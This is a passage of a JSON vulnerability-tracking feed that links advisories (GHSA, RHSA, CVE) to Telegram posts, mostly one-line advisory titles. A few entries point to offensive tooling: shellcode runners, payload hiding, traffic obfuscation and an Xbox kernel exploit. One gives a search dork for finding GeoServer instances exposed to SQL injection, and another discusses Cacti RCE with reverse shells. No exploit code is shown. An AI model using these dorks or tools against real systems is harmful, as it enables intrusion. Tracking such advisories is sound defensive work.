"source": "https://t.me/ctinow/207324", "content": "https://ift.tt/p967Kx1\nRHSA-2024:1323: Important: kpatch-patch security update", "creation_timestamp": "2024-03-14T00:16:42.000000Z"}, {"uuid": "0e5f01d6-cf97-402f-ad66-5215969f87e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0573", "type": "seen", "source": "https://t.me/ctinow/205344", "content": "https://ift.tt/ySqNmix\nCVE-2019-16776 | npm CLI up to 6.13.3 Install Script bin path traversal (RHSA-2020:0573)", "creation_timestamp": "2024-03-12T07:36:39.000000Z"}, {"uuid": "29ec0dd0-823b-4f41-971e-80d14ef0e793", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0573", "type": "seen", "source": "https://t.me/ctinow/205343", "content": "https://ift.tt/ngNtfF6\nCVE-2019-16775 | npm CLI up to 6.13.3 Install Script bin symlink (RHSA-2020:0573)", "creation_timestamp": "2024-03-12T07:36:38.000000Z"}, {"uuid": "f14309f7-8812-4a9f-ad42-2f00bf6c15a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3QWC-47JF-5RF7", "type": "seen", "source": "https://t.me/ctinow/200360", "content": "https://ift.tt/P1Cqo8R\n[GHSA-3qwc-47jf-5rf7] eth-abi is vulnerable to recursive DoS", "creation_timestamp": "2024-03-05T15:42:51.000000Z"}, {"uuid": "daadeb9f-2ba5-4f57-bfdf-150041889c21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JW44-4F3J-Q396", "type": "seen", "source": "https://t.me/ctinow/200359", "content": "https://ift.tt/9YfhJZC\n[GHSA-jw44-4f3j-q396] Helm shows secrets in clear text", "creation_timestamp": "2024-03-05T15:42:50.000000Z"}, {"uuid": "3fef0cbb-04c9-4562-b8d2-b29329369990", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1085", "type": "seen", "source": "https://t.me/ctinow/199991", "content": "https://ift.tt/KNeX6PE\nRHSA-2024:1085: Important: squid security update", "creation_timestamp": "2024-03-05T08:13:10.000000Z"}, {"uuid": "d461cf2d-1d1f-45eb-a9fb-7aad6b4383f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4HH3-VJ32-GR6J", "type": "published-proof-of-concept", "source": "https://t.me/GrayHatsHack/7349", "content": "Tools  - Hackers Factory \n\nTookie-osint has a simple-to-use UI and is really straightforward. The main idea of Tookie-osint is to discover usernames that are requested from an input.\n\nhttps://github.com/Alfredredbird/tookie-osint\n\n#CyberDilara\n\nGPU poisoning; hide the payload inside the gpu memory.\n\nhttps://github.com/H1d3r/GPU_ShellCode\n\nThis is a simple obfuscator for WireGuard. It is designed to make it harder to detect WireGuard traffic by making it look like something else.\n\nhttps://github.com/ClusterM/wg-obfuscator\n\nSploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability.\n\nhttps://github.com/xaitax/SploitScan\n\nA shellcode runner write in Rust use\n\nhttps://github.com/b1tg/rs-shellcode\n\nKernel exploit for Xbox SystemOS using CVE-2024-30088\n\nhttps://github.com/exploits-forsale/collateral-damage\n\nZip Slip Vulnerability in .a Static Library Files.  Since the implemented measure can be bypassed, the vulnerability allows an attacker to extract files to any desired location within the server running #MobSF.\n\nhttps://github.com/MobSF/Mobile-Security-Framework-MobSF/security/advisories/GHSA-4hh3-vj32-gr6j\n\nPython script to monitor your target continuously for new subdomains.\n\nhttps://github.com/faiyazahmad07/monitor_subdomains\n\n#CyberDilara\nhttps://t.me/CyberDilara", "creation_timestamp": "2024-08-27T09:08:21.000000Z"}, {"uuid": "0e545c84-78d6-42be-af00-c30f559e855c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G2Q5-5433-RHRF", "type": "seen", "source": "https://t.me/d34th_5kull/5678", "content": "Malware yang disematkan di rc \n\nPaket npm rc memiliki versi yang diterbitkan dengan kode berbahaya. Pengguna versi yang terpengaruh (1.2.9, 1.3.9, dan 2.3.9) harus menurunkan versi ke 1.2.8 sesegera mungkin dan memeriksa sistem mereka untuk aktivitas yang mencurigakan.\n\nKomputer apa pun yang menginstal atau menjalankan paket ini harus dianggap sepenuhnya dikompromikan. Semua rahasia dan kunci yang disimpan di komputer itu harus segera dirotasi dari komputer lain. Paket harus dihapus, tetapi karena kontrol penuh komputer mungkin telah diberikan kepada entitas luar, tidak ada jaminan bahwa menghapus paket akan menghapus semua perangkat lunak berbahaya yang dihasilkan dari menginstalnya.\n\n\nReferensi:\n\u2022https://github.com/dominictarr/rc\n\u2022https://www.npmjs.com/package/rc\n\nhttps://www.virustotal.com/gui/file/26451f7f6fe297adf6738295b1dcc70f7678434ef21d8b6aad5ec00beb8a72cf?nocache=1\n\nhttps://github.com/advisories/GHSA-g2q5-5433-rhrf\n\n#Malware #NPM #rc", "creation_timestamp": "2021-11-09T02:58:45.000000Z"}, {"uuid": "d1f0052e-0979-4eb7-adb6-05349740a689", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7G5F-WRX8-5CCF", "type": "published-proof-of-concept", "source": "https://t.me/codeb0ss/788", "content": "GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n\nDork : inurl:\"/geoserver/ows?service=wfs\n\nhttps://github.com/geoserver/geoserver/commit/145a8af798590288d270b240235e89c8f0b62e1d\nhttps://github.com/geoserver/geoserver/security/advisories/GHSA-7g5f-wrx8-5ccf\n\nenjoy", "creation_timestamp": "2023-06-09T18:56:11.000000Z"}, {"uuid": "633343a4-92bb-4230-b2cd-7454f99ee8e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6P93-P743-35GF", "type": "published-proof-of-concept", "source": "https://t.me/MrVGunz/665", "content": "\ud83d\udca3 \u0647\u0634\u062f\u0627\u0631!\n\n\u0627\u0628\u0631\u0627\u0632 \u0645\u0627\u0646\u06cc\u062a\u0648\u0631\u06cc\u0646\u06af Cacti \u06cc\u06a9\u06cc \u0627\u0632 \u0645\u0639\u0631\u0648\u0641\u062a\u0631\u06cc\u0646 \u0647\u0627 \u0648 \u067e\u0631\u06a9\u0627\u0631\u0628\u0631\u062f\u062a\u0631\u06cc\u0646 \u0627\u0628\u0632\u0627\u0631\u0647\u0627\u060c \u0628\u062e\u0635\u0648\u0635 \u062f\u0631 \u0628\u062e\u0634 \u0634\u0628\u06a9\u0647 \u0627\u0633\u062a \u06a9\u0647 \u062f\u0631 \u0627\u06cc\u0631\u0627\u0646 \u0646\u06cc\u0632 \u062a\u0648\u062c\u0647 \u0648\u06cc\u0698\u0647 \u0627\u06cc \u0628\u0647 \u0622\u0646 \u0645\u06cc \u0634\u0648\u062f.\n\u062e\u06cc\u0644\u06cc \u0627\u0632 \u0645\u062c\u0645\u0648\u0639\u0647 \u0647\u0627\u060c \u0628\u0647 \u062f\u0644\u06cc\u0644 \u0631\u0627\u062d\u062a\u06cc \u062f\u0631 \u067e\u06cc\u0627\u062f\u0647 \u0633\u0627\u0632\u06cc \u0648 \u0627\u0632 \u0647\u0645\u0647 \u0645\u0647\u0645\u062a\u0631 \u0645\u062a\u0646 \u0628\u0627\u0632 \u0648 \u0631\u0627\u06cc\u06af\u0627\u0646 \u0628\u0648\u062f\u0646\u060c \u0627\u0632 \u0622\u0646 \u0628\u0647\u0631\u0647 \u0645\u06cc \u0628\u0631\u062f\u0646\u062f.\n\n\u062d\u062a\u0645\u0627 \u0627\u062e\u0628\u0627\u0631 \u0645\u0631\u0628\u0648\u0637 \u0628\u0647 Solarwinds \u0631\u0627 \u0628\u0647 \u06cc\u0627\u062f \u062f\u0627\u0631\u06cc\u062f\u060c \u0627\u06cc\u0646\u062c\u0627 \u0628\u062d\u062b \u0645\u0642\u0627\u06cc\u0633\u0647 \u0646\u06cc\u0633\u062a \u0628\u06cc\u0634\u062a\u0631 \u0627\u0647\u0645\u06cc\u062a \u0648 \u062c\u0627\u06cc\u06af\u0627\u0647 \u0627\u06cc\u0646 \u0642\u0628\u06cc\u0644 \u0645\u062d\u0635\u0648\u0644\u0627\u062a \u0627\u0633\u062a \u06a9\u0647 \u0645\u0648\u0636\u0648\u0639 \u0631\u0627 \u067e\u0631 \u0631\u0646\u06af \u0645\u06cc \u06a9\u0646\u062f.\n\n\u0622\u0633\u06cc\u0628 \u067e\u0630\u06cc\u0631\u06cc \u062d\u06cc\u0627\u062a\u06cc \u0628\u0627 \u0627\u0645\u062a\u06cc\u0627\u0632 9.8 \u0627\u0632 \u0646\u0648\u0639 RCE (\u06a9\u0647 \u0627\u0645\u06a9\u0627\u0646 \u0628\u0631\u067e\u0627\u06cc\u06cc Reverse Shell \u0631\u0627 \u0646\u06cc\u0632 \u0628\u0631\u0627\u06cc \u0645\u0647\u0627\u062c\u0645 \u0628\u0647 \u0627\u0631\u0645\u063a\u0627\u0646 \u0645\u06cc \u0622\u0648\u0631\u062f) \u0628\u0627 \u0634\u0646\u0627\u0633\u0647 CVE-2022-46169 \u062f\u0631 \u0627\u06cc\u0646 \u0645\u062d\u0635\u0648\u0644 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0634\u062f\u0647 \u0627\u0633\u062a.\n\n\ud83d\udd11 \u062f\u0631 \u0635\u0648\u0631\u062a\u06cc \u06a9\u0647 \u0627\u0632 \u0627\u06cc\u0646 \u0627\u0628\u0632\u0627\u0631 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc \u0646\u0645\u0627\u06cc\u062f\u060c \u0647\u0631\u0686\u0647 \u0633\u0631\u06cc\u0639\u062a\u0631 \u0628\u0647 \u0631\u0648\u0632\u0631\u0633\u0627\u0646\u06cc \u0631\u0627 \u062f\u0631 \u0627\u0648\u0644\u0648\u06cc\u062a \u0642\u0631\u0627\u0631 \u062f\u0647\u06cc\u062f.\n\n\u062c\u0632\u0626\u06cc\u0627\u062a  \u06a9\u0627\u0645\u0644: https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf", "creation_timestamp": "2023-01-19T18:30:59.000000Z"}, {"uuid": "8be36d71-ad60-421d-9e15-dd11ab793af3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PW56-C55X-CM9M", "type": "published-proof-of-concept", "source": "https://t.me/crackcodes/1626", "content": "#Threat_Research\n1. HTTP Desync Attack (Request Smuggling) - Mass Account Takeover at a Cryptocurrency based asset and 121 other websites\nhttps://github.com/AnkitCuriosity/Write-Ups/blob/main/HTTP%20Desync%20Attack%20(Request%20Smuggling).md\n2. Visual Studio Code: RCE\nhttps://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m", "creation_timestamp": "2022-12-06T04:04:16.000000Z"}, {"uuid": "4a9ccf49-aa1f-4155-b25d-404f99ee8bbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1403", "type": "seen", "source": "https://t.me/ctinow/211792", "content": "https://ift.tt/PNk2Bw1\nRHSA-2024:1403: Moderate: fwupd security update", "creation_timestamp": "2024-03-19T18:16:38.000000Z"}, {"uuid": "b5656ca1-d8d3-4b2d-9346-773c04aec1f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1404", "type": "seen", "source": "https://t.me/ctinow/211791", "content": "https://ift.tt/e1xusmB\nRHSA-2024:1404: Important: kernel security and bug fix update", "creation_timestamp": "2024-03-19T18:16:37.000000Z"}, {"uuid": "16a29649-17ad-41be-ab71-104f54c47e86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-879P-8GW4-MCPW", "type": "seen", "source": "https://t.me/ctinow/209085", "content": "https://ift.tt/eV6pLoQ\n[GHSA-879p-8gw4-mcpw] fgr Vulnerable to Insecure Default Variable Initialization", "creation_timestamp": "2024-03-15T20:16:27.000000Z"}, {"uuid": "5adea336-9d94-4454-aaf8-d53ac77192d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W5WX-6G2R-R78Q", "type": "seen", "source": "https://t.me/ctinow/209074", "content": "https://ift.tt/HLGaykl\n[GHSA-w5wx-6g2r-r78q] Nuclei allows unsigned code template execution through workflows", "creation_timestamp": "2024-03-15T19:56:16.000000Z"}, {"uuid": "9e01b203-36f6-4019-b907-0f396ab5a302", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5H3X-6GWF-73JM", "type": "seen", "source": "https://t.me/ctinow/208979", "content": "https://ift.tt/Fukysj3\n[GHSA-5h3x-6gwf-73jm] vantage6 vulnerable to a username timing attack on recover password/MFA token", "creation_timestamp": "2024-03-15T17:51:57.000000Z"}, {"uuid": "e91174d6-3af4-46d6-8fde-5c0c2ab00165", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4946-85PR-FVXH", "type": "seen", "source": "https://t.me/ctinow/208978", "content": "https://ift.tt/zimb65I\n[GHSA-4946-85pr-fvxh] vantage6's CORS settings overly permissive", "creation_timestamp": "2024-03-15T17:51:56.000000Z"}, {"uuid": "dfeaa288-6c47-4177-8ca6-b3b7a64d6189", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-494H-9924-XWW9", "type": "seen", "source": "https://t.me/ctinow/208977", "content": "https://ift.tt/EaB5nqQ\n[GHSA-494h-9924-xww9] Pterodactyl Wings vulnerable to improper isolation of server file access", "creation_timestamp": "2024-03-15T17:51:55.000000Z"}, {"uuid": "e0a92b07-3fc0-4d28-b2af-08ebcff9ed6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WX8Q-4GM9-RJ2G", "type": "seen", "source": "https://t.me/ctinow/208974", "content": "https://ift.tt/SMtHblm\n[GHSA-wx8q-4gm9-rj2g] Fluid vulnerable to OS Command Injection for Fluid Users with JuicefsRuntime", "creation_timestamp": "2024-03-15T17:47:14.000000Z"}, {"uuid": "e7594657-80cb-4ba2-8797-96e44abfb0f6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G623-JCGG-MHMM", "type": "seen", "source": "https://t.me/ctinow/208973", "content": "https://ift.tt/tGNUgWq\n[GHSA-g623-jcgg-mhmm] Users with `create` but not `override` privileges can perform local sync", "creation_timestamp": "2024-03-15T17:47:13.000000Z"}, {"uuid": "a1d69cc7-b3ec-4584-bac1-ae062315d8d7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V8MX-HP2Q-GW85", "type": "seen", "source": "https://t.me/ctinow/209149", "content": "https://ift.tt/3MaSeWI\n[GHSA-v8mx-hp2q-gw85] Golang SDK for Vela Insecure Variable Substitution", "creation_timestamp": "2024-03-15T21:16:51.000000Z"}, {"uuid": "99e31f08-e30e-4b65-bf1a-cdbd28beba2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-69P4-J5V5-X234", "type": "seen", "source": "https://t.me/ctinow/209148", "content": "https://ift.tt/RwWo3mj\n[GHSA-69p4-j5v5-x234] Server/API for Vela Insecure Variable Substitution", "creation_timestamp": "2024-03-15T21:16:50.000000Z"}, {"uuid": "3e1d3d7d-404c-41ab-a1d7-06db896f1ac7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7V38-W32M-WX4M", "type": "seen", "source": "https://t.me/ctinow/209147", "content": "https://ift.tt/HWKyL2I\n[GHSA-7v38-w32m-wx4m] Types for Vela Insecure Variable Substitution", "creation_timestamp": "2024-03-15T21:16:49.000000Z"}, {"uuid": "d636e51b-e31a-4d4f-8688-dd16c83e16be", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2QPH-QPVM-2QF7", "type": "seen", "source": "https://t.me/ctinow/209140", "content": "https://ift.tt/8O2Yrjc\n[GHSA-2qph-qpvm-2qf7] tls-listener affected by the slow loris vulnerability with default configuration", "creation_timestamp": "2024-03-15T21:07:12.000000Z"}, {"uuid": "9be0bf4d-5346-4672-becf-6ebb6fa2ff3c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MP76-7W5V-PR75", "type": "seen", "source": "https://t.me/ctinow/209139", "content": "https://ift.tt/Xl2ufbN\n[GHSA-mp76-7w5v-pr75] TurboBoost Commands vulnerable to arbitrary method invocation", "creation_timestamp": "2024-03-15T21:07:11.000000Z"}, {"uuid": "9d3ba57b-a2ca-4166-ac39-7d150fabe3db", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4238", "type": "seen", "source": "https://t.me/ctinow/203986", "content": "https://ift.tt/X81OyqH\nCVE-2019-13738 | Google Chrome prior 79.0.3945.79 Policy Enforcement HTML Page permission assignment (RHSA-2019:4238)", "creation_timestamp": "2024-03-09T16:11:32.000000Z"}, {"uuid": "08caa2ca-6693-4800-b278-a5b29c9f02c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X32M-MVFJ-52XV", "type": "seen", "source": "https://t.me/ctinow/210837", "content": "https://ift.tt/xFfkD56\n[GHSA-x32m-mvfj-52xv] Bypassing Brute Force Protection via Application Crash and In-Memory Data Loss", "creation_timestamp": "2024-03-18T18:36:49.000000Z"}, {"uuid": "67338375-e510-439e-b22b-07b2a15fa0d4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X7MF-WRH9-R76C", "type": "seen", "source": "https://t.me/ctinow/210965", "content": "https://ift.tt/OWFQCjJ\n[GHSA-x7mf-wrh9-r76c] XSS via the \"Snapshot Test\" feature in Classic Webcam plugin settings", "creation_timestamp": "2024-03-18T21:37:02.000000Z"}, {"uuid": "6bd37752-d6a5-4867-a082-0d5ebf390857", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6V85-WR92-Q4P7", "type": "seen", "source": "https://t.me/ctinow/210964", "content": "https://ift.tt/8bCMxKf\n[GHSA-6v85-wr92-q4p7] Denial of Service (DoS) Vulnerability Due to Unsafe Array Modification in Multi-threaded Environment", "creation_timestamp": "2024-03-18T21:37:01.000000Z"}, {"uuid": "8e8d6661-f34f-4388-92ee-a4501ce57db1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2VGG-9H6W-M454", "type": "seen", "source": "https://t.me/ctinow/210963", "content": "https://ift.tt/42imgyj\n[GHSA-2vgg-9h6w-m454] Bypassing Rate Limit and Brute Force Protection Using Cache Overflow", "creation_timestamp": "2024-03-18T21:37:00.000000Z"}, {"uuid": "6d3e8010-56d1-45c6-a9f1-2ee311a390b0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F3JH-QVM4-MG39", "type": "seen", "source": "https://t.me/ctinow/210952", "content": "https://ift.tt/d2K3LVR\n[GHSA-f3jh-qvm4-mg39] Erroneous authentication pass in Spring Security", "creation_timestamp": "2024-03-18T21:21:44.000000Z"}, {"uuid": "faa825f1-233d-480f-903e-58df42f491e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0566", "type": "seen", "source": "https://t.me/ctinow/211350", "content": "https://ift.tt/h67ZXpq\nCVE-2020-5312 | Pillow up to 6.2.1 PCX P Mode libImaging/PcxDecode.c buffer overflow (RHSA-2020:0566)", "creation_timestamp": "2024-03-19T11:11:38.000000Z"}, {"uuid": "ab77bece-14e4-4d98-aea8-d9fc9014b4a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2020:0566", "type": "seen", "source": "https://t.me/ctinow/211333", "content": "https://ift.tt/vQPIoyg\nCVE-2020-5311 | Pillow up to 6.2.1 SGI SgiRleDecode.c buffer overflow (RHSA-2020:0566)", "creation_timestamp": "2024-03-19T10:41:10.000000Z"}, {"uuid": "2e9ef42f-a7b0-44a1-91a6-2a3f8e9c7998", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:4341", "type": "seen", "source": "https://t.me/ctinow/211305", "content": "https://ift.tt/sP5NkEz\nCVE-2019-10205 | Red Hat Quay Robot Account Token insufficiently protected credentials (RHSA-2019:4341)", "creation_timestamp": "2024-03-19T10:04:46.000000Z"}, {"uuid": "623cd9f2-7c22-450e-aa7e-9be979d099bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5VCC-86WM-547Q", "type": "seen", "source": "https://t.me/ctinow/210976", "content": "https://ift.tt/yTLPjuh\n[GHSA-5vcc-86wm-547q] Improper Privilege Management in djangorestframework-simplejwt", "creation_timestamp": "2024-03-18T21:46:15.000000Z"}, {"uuid": "e4c8419e-0b81-43aa-bcff-9525bcf30a34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJV8-PXR6-5F4R", "type": "seen", "source": "https://t.me/ctinow/210975", "content": "https://ift.tt/egBKLbw\n[GHSA-wjv8-pxr6-5f4r] Gadget chain in Symfony 1 due to vulnerable Swift Mailer dependency", "creation_timestamp": "2024-03-18T21:46:14.000000Z"}, {"uuid": "af945251-2a80-4921-ab19-61d6a8127d2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1345", "type": "seen", "source": "https://t.me/ctinow/210219", "content": "https://ift.tt/kLiZE8p\nRHSA-2024:1345: Important: Red Hat OpenShift GitOps security update", "creation_timestamp": "2024-03-18T07:16:52.000000Z"}, {"uuid": "a9afeb75-dd20-47f0-8f73-b951166b6d0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4RVG-555H-R626", "type": "seen", "source": "https://t.me/ctinow/200129", "content": "https://ift.tt/NcOClZU\nCVE-2019-19316 | Terraform up to 0.12.16 risky encryption (GHSA-4rvg-555h-r626)", "creation_timestamp": "2024-03-05T11:41:59.000000Z"}, {"uuid": "26e65849-7d88-440a-af91-58cd3db9161a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1372", "type": "seen", "source": "https://t.me/ctinow/211434", "content": "https://ift.tt/FuqI1nw\nRHSA-2024:1372: Moderate: redhat-ds:11 security, bug fix, and enhancement update", "creation_timestamp": "2024-03-19T13:21:11.000000Z"}, {"uuid": "3ca073b3-828c-4727-bd2f-00898df02c15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X2H8-QMJ4-G62F", "type": "seen", "source": "https://t.me/ctinow/210836", "content": "https://ift.tt/eY5lWmn\n[GHSA-x2h8-qmj4-g62f] ROTP 6.2.2 and 6.2.1 has 0666 permissions for the .rb files.", "creation_timestamp": "2024-03-18T18:36:48.000000Z"}, {"uuid": "0609388f-d746-40f9-9cfc-e8df60896dde", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1318", "type": "seen", "source": "https://t.me/ctinow/210492", "content": "https://ift.tt/t6cfGzp\nRHSA-2024:1318: Important: Red Hat JBoss Web Server 5.7.8 release and security update", "creation_timestamp": "2024-03-18T13:16:28.000000Z"}, {"uuid": "5709277f-4bc8-4d8f-adb1-928e4623574b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:1319", "type": "seen", "source": "https://t.me/ctinow/210491", "content": "https://ift.tt/CzhjBtH\nRHSA-2024:1319: Important: Red Hat JBoss Web Server 5.7.8 release and security update", "creation_timestamp": "2024-03-18T13:16:27.000000Z"}, {"uuid": "392903a4-0100-4412-848f-ff060e06ef19", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V6Q2-4QR3-5CW6", "type": "seen", "source": "https://t.me/ctinow/210981", "content": "https://ift.tt/SJMvFLd\n[GHSA-v6q2-4qr3-5cw6] Unencrypted traffic between nodes when using WireGuard and L7 policies", "creation_timestamp": "2024-03-18T21:46:21.000000Z"}, {"uuid": "73641b5b-2f85-40f7-8ca4-6dd5a9509fc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J89H-QRVR-XC36", "type": "seen", "source": "https://t.me/ctinow/210980", "content": "https://ift.tt/NsxhrBY\n[GHSA-j89h-qrvr-xc36] Unencrypted traffic between nodes when using IPsec and L7 policies", "creation_timestamp": "2024-03-18T21:46:20.000000Z"}, {"uuid": "1898c9bd-bb44-4990-9f63-62f7b0abb759", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HFRG-4JWR-JFPJ", "type": "seen", "source": "https://t.me/ctinow/210979", "content": "https://ift.tt/eqrVkjJ\n[GHSA-hfrg-4jwr-jfpj] Improper HTML sanitization in ZITADEL", "creation_timestamp": "2024-03-18T21:46:19.000000Z"}, {"uuid": "a0ada5b3-248d-4615-a1eb-08b9f8a58b7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RJ29-J2G4-77Q8", "type": "seen", "source": "https://t.me/ctinow/210978", "content": "https://ift.tt/p7tvr13\n[GHSA-rj29-j2g4-77q8] [TagAwareCipher] - Decryption Failure (Regex Match)", "creation_timestamp": "2024-03-18T21:46:18.000000Z"}, {"uuid": "207703db-2470-4ed1-abfa-59deaa27b5a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WJ85-W4F4-XH8H", "type": "seen", "source": "https://t.me/ctinow/210977", "content": 